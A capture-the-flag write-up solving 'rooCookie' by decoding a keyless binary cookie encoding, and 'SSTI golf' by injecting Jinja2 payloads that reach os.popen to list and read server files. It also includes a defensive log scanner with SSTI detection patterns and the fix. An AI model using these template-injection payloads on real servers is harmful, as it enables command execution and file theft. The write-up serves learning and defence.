# rooCookie & SSTI golf

## rooCookie

According to the challenge description, the author seems to have set the flag as the password, and says ***'I fed my website some cookies so it would remember me'*** => maybe the flag is in the cookies.

![](https://i.imgur.com/Ib4H8dY.png)

### View source code

- We get a function `createToken(text)`; it "encrypts" a text and then assigns the result to `document.cookie`:

```javascript
function createToken(text) {
    let encrypted = "";
    for (let i = 0; i < text.length; i++) {
        // shift every character code by -43+1337 and append its binary form (no padding)
        encrypted += ((text[i].charCodeAt(0) - 43 + 1337) >> 0).toString(2)
    }
    document.cookie = encrypted
}

document.cookie = "token=101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000"
```

- Notice that there is a predefined `document.cookie` => is this the flag?
- If so, we just reverse the `createToken()` function to get the flag.

### Analysis of the encoding process

- First, each character in `text` goes through **charCodeAt()** => the function returns the Unicode value of that character.
- That value is then shifted by **(-43+1337)**, i.e. 1294 is added to it.
- **'>>'** is the right-shift operator, but the shift amount is **0** (**'>> 0'**), so the value does not change (it is only truncated to a 32-bit integer, which has no effect here).
- Finally it is converted to binary with `toString(2)`, which adds no leading zeros. Every printable ASCII character (codes 32 to 126) becomes a value between 1326 and 1420 after the shift, and all of those need exactly 11 binary digits, so the token can be split into fixed 11-bit chunks.

### Decryption script

```python
token = "101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000"

decrypted = ''
for i in range(len(token) // 11):            # every character became exactly 11 bits
    chunk = token[11 * i:11 * i + 11]
    decrypted += chr(int(chunk, 2) - 1337 + 43)  # undo the (-43+1337) shift
print(decrypted)
# username="roo" & password="ictf{h0p3_7ha7_wa5n7_t00_b4d}"
```

#### Flag : **ictf{h0p3_7ha7_wa5n7_t00_b4d}**

## SSTI golf

### Check source code

```python
#!/usr/bin/env python3
from flask import Flask, render_template_string, request, Response

app = Flask(__name__)


@app.route('/')
def index():
    return Response(open(__file__).read(), mimetype='text/plain')


@app.route('/ssti')
def ssti():
    query = request.args['query'] if 'query' in request.args else '...'
    if len(query) > 48:
        return "Too long!"
    return render_template_string(query)


app.run('0.0.0.0', 1337)
```

- The **'/'** route returns the source code of the application itself.
- The **'/ssti'** route is mapped to the **'/ssti'** path and takes the `query` parameter => **/ssti?query=**
- The input **query** is checked for length: if it exceeds 48 characters the app returns "Too long!".
- If it is 48 characters or fewer, the app returns **render_template_string(query)**, i.e. the user input itself is rendered as a Jinja2 template.

> [Note](https://workshops.devax.academy/security-for-developers/module9/fix_ssti_vulnerability.html): The page uses **render_template_string** for rendering the HTML response. The function renders the template directly from a string, which can trigger a potential Server-Side Template Injection (SSTI) if the string has been modified to include valid Python code.

### Exploit

- The challenge is written in Python and renders Jinja2 templates. I found a basic payload of **{{7*7}}**. I injected the query input with the payload and analyzed the responses. => Successful !!!

![](https://i.imgur.com/Yh3hHSM.png)

- I used this payload to list all file names: `{{lipsum.__globals__['os'].popen('ls').read()}}`

![](https://i.imgur.com/z6BBQOA.png)

- Because the file name is too long, I used the command `cat *` to read all the files in the current folder: `{{lipsum.__globals__.os.popen('cat *').read()}}`

![](https://i.imgur.com/wxuS4HM.png)

#### Flag : **ictf{F!1+3r5s!?}**

#### References

- https://chowdera.com/2020/12/20201221231521371q.html
- https://workshops.devax.academy/security-for-developers/module9/fix_ssti_vulnerability.html
- https://hackmd.io/@Chivato/HyWsJ31dI#What-is-a-SSTI
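Going back to the rooCookie section: the following is an added example (not code from the writeup or the challenge) that re-implements the browser's `createToken()` in Python together with its inverse. It makes the security point of that section explicit: the cookie is produced by a keyless, fixed-offset encoding, so anyone holding the cookie can recover the credentials, and the 11-bit chunking relied on by the decryption script holds for every printable ASCII character. The function names and the sample string are assumptions made for this example.

```python
"""Keyless cookie "encryption" from the rooCookie challenge, re-done in Python.

Added example, not part of the original writeup. Names below are chosen here.
"""

OFFSET = -43 + 1337  # the constant the JavaScript adds to every character code (1294)


def create_token(text: str) -> str:
    """Mirror of createToken(): shift each code point and append its bare binary form.

    format(n, "b") behaves like JavaScript's n.toString(2): no leading zeros.
    """
    return "".join(format(ord(ch) + OFFSET, "b") for ch in text)


def decode_token(bits: str) -> str:
    """Invert create_token() for printable ASCII input.

    Printable ASCII (32..126) shifts to 1326..1420, which always occupies
    exactly 11 binary digits, so the bit string splits into 11-bit chunks.
    Anything that does not decode to printable ASCII is reported instead of
    being silently turned into garbage.
    """
    if len(bits) % 11:
        raise ValueError("token length is not a multiple of 11 bits")
    out = []
    for i in range(0, len(bits), 11):
        code = int(bits[i:i + 11], 2) - OFFSET
        if not 32 <= code <= 126:
            raise ValueError(f"chunk at bit {i} does not decode to printable ASCII")
        out.append(chr(code))
    return "".join(out)


def roundtrip(text: str) -> bool:
    """True when encoding then decoding returns the original text (no key needed)."""
    return decode_token(create_token(text)) == text


if __name__ == "__main__":
    # Constructed sample; the real cookie on the page carried the username and password.
    sample = 'username="roo" & password="flag{constructed_sample}"'
    token = create_token(sample)
    print(len(token), "bits ->", decode_token(token))
```

Nothing secret enters `create_token`, so the "encryption" is only an obfuscation of the cookie value; the check in `decode_token` is what lets you trust the fixed 11-bit split rather than assuming it.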
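For the SSTI golf section, the following is an added example (not code from the writeup or the challenge) written from the defender's side: it scans web-server access logs for requests to the `/ssti` endpoint whose `query` parameter is being evaluated as template source, distinguishing a simple `{{7*7}}` probe from the `lipsum.__globals__`/`popen` payloads used above. The log format, the sample lines and the function names are constructed for this example; the payload strings are the ones already shown in the writeup.

```python
"""Flag SSTI probes against the /ssti endpoint in access logs.

Added example, not part of the original writeup. The log lines below are
constructed (not real traffic) and follow a common web-server log layout.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic: a harmless value, the {{7*7}} probe, the two
# payloads from the writeup, and an unrelated static-file request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ssti?query=hello HTTP/1.1" 200 5
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /ssti?query=%7B%7B7*7%7D%7D HTTP/1.1" 200 2
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /ssti?query=%7B%7Blipsum.__globals__%5B%27os%27%5D.popen(%27ls%27).read()%7D%7D HTTP/1.1" 200 60
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ssti?query=%7B%7Blipsum.__globals__.os.popen(%27cat%20*%27).read()%7D%7D HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /static/app.css HTTP/1.1" 200 120
"""

# ip, timestamp, method, request target and status from a combined-style log line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Template delimiters show the input is being treated as template source;
# dunder attributes or popen show the probe is walking objects to reach the OS.
TEMPLATE_SYNTAX = re.compile(r"\{\{|\{%")
INTROSPECTION = re.compile(r"__\w+__|\bpopen\b")

MAX_QUERY_LEN = 48  # the challenge's length cap


def classify_query(query: str) -> str:
    """Return 'benign', 'probe' or 'rce_attempt' for one decoded query value."""
    if not TEMPLATE_SYNTAX.search(query):
        return "benign"
    if INTROSPECTION.search(query):
        return "rce_attempt"
    return "probe"


def scan_log(text: str) -> list:
    """Return one finding per suspicious /ssti request, in log order."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/ssti":
            continue
        # parse_qs undoes the percent-encoding, so patterns match the real input
        for query in parse_qs(parts.query, keep_blank_values=True).get("query", []):
            verdict = classify_query(query)
            if verdict == "benign":
                continue
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "query": query,
                "verdict": verdict,
                "length": len(query),
                "within_limit": len(query) <= MAX_QUERY_LEN,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["verdict"], f["length"], repr(f["query"]))
```

Both working payloads from the writeup decode to 47 characters, so every finding has `within_limit` set: the 48-character cap that gives the challenge its "golf" name is not a mitigation. The fix is the one the linked note points at, never pass user input to `render_template_string` as the template itself; render a fixed template and hand the input over as a template variable instead.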